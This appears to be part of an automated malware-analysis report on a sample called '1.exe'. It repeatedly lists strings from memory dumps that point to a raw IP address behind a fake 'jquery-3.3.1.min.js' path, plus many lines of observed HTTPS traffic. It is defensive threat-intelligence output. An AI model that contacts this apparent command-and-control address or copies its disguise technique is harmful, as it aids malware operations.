        Source: 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsE
        Source: 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2260354455.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsG
        Source: 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsI
        Source: 1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsM
        Source: 1.exe, 00000000.00000003.2260354455.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsO
        Source: 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsP
        Source: 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337370173.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393456740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsQ
        Source: 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsR3-
        Source: 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsU
        Source: 1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsY
        Source: 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsa
        Source: 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337370173.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393456740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06
        Source: 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06C
        Source: 1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2509193576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06O
        Source: 1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06ad
        Source: 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jse
        Source: 1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393356882.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200192483.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsh
        Source: 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2279731119.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsi
        Source: 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsi%
        Source: 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsiC
        Source: 1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsiO
        Source: 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsiU
        Source: 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsic
        Source: 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsicate
        Source: 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsim
        Source: 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsj
        Source: 1.exe, 00000000.00000003.2450808261.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2469922899.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsm
        Source: 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsp
        Source: 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jss
        Source: 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsv
        Source: 1.exe, 00000000.00000003.2450808261.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsy
        Source: 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsyptography
        Source: 1.exe, 00000000.00000003.2298925896.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/l
        Source: 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/p
        Source: 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/rovider
        Source: 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/roviderU
        Source: 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591343411.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/tography
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
